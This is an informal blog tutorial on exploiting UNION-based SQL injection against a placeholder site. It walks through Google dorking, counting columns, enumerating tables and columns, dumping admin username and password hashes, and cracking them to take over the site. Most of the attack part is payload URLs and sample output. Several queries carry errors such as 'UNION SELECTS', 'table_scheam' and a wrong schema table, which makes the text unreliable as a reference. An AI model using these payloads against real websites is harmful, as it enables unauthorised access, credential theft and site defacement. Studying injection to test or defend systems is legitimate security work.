SQL injection explained

0
Today i will explain the SQL injection. Input based attack is most effective for testing web security. And the SQL is most popular for web hacking. No wait, Let’s start(Hey, i am not going to explain what is SQL injection; it is how to exploit).

Testing if the target is vulnerable :

Suppose the target site is http://www.victim.com. We can quickly gather some information by Google for finding some parameters based URL. Simply if go to google and search like :

site:www.victim.com filetype:php

(Note: I think you already gathered some information against the site . So you know what is their file extension . If you are attacking randomly then go away from here.)

Then we see many result like:
www.victim.com/index.php

www.victim.com/something.php?id=3

etc

Simply browse the www.victim.com/something.php?id=3 and add one more thing . Example:

www.victim.com/something.php?id=3

If the site is vulnerable then we will see SQL error like:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” AND products.obsolete=’N” at line 1

If we see this error on that page then we are confirm the site is vulnerable and exploitable. 






Next ATTACK

Finding the columns Number:

First we will check that how column is available by “ORDER BY” query. If we reach the more than available columns then we will get error “Unknown Column”.

No error:

www.victim.com/something.php?id=3 ORDER BY 4–



No error:

www.victim.com/something.php?id=3 ORDER BY 5–



Error:

www.victim.com/something.php?id=3 ORDER BY 6–



Now we are confirm that it has 6 columns . If you get no error then try more columns 7,8,9  etc.

How to find the Vulnerable column

To find the Vulnerable columns we need “UNION SELECT” command. So:

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,5,6–

Now we will see 1-6(Anyone or multiple) number on pages. Suppose we see it is “5”

So now we know the column number 5 is vulnerable.

Checking the MySQL version :

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,@@version,6–

We know the MySQL version is 5(version 4 won’t work).

Great ! now We quickly need their Users database dump. So quick !!!

Now we need the all tables name

Getting Tables Name  

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_scheam=database()–

So we get several tables name. For example we get :

links
pages
tokens
visitor

creditcard

users
transaction

etc…

We want to logging as a powerful user so that we can edit their pages. To do this first we need to find out columns name:

Getting Columns name:

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,group_concat(columns_name),6 from information_schema.tables where table_name=users–

 
So from this query we get output like :

id
username
email
firstname
lastname
password
link

It is simply understandable that we need username and password columns for getting admin access:

Grabbing The username and password:

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,group_concat(username,0x3a,password),6 from users–

So you get output all username and password like, admin:akde3d09kd4ur489deqa9094ldad48dkr 

super:54ee3d09kd4ur489deqa9094ldad4u78l

Now crack the hash and then logging with username  “admin” or “super” and plain text(Cracked).

If you don’t know how to crack hash check out other articles…

There are many sql injection technique …. but I explained here which is very common. So try more , research and research.

I hope there are some mistake i made… If you can catch them then feel free to contact me..

Good Luck!!!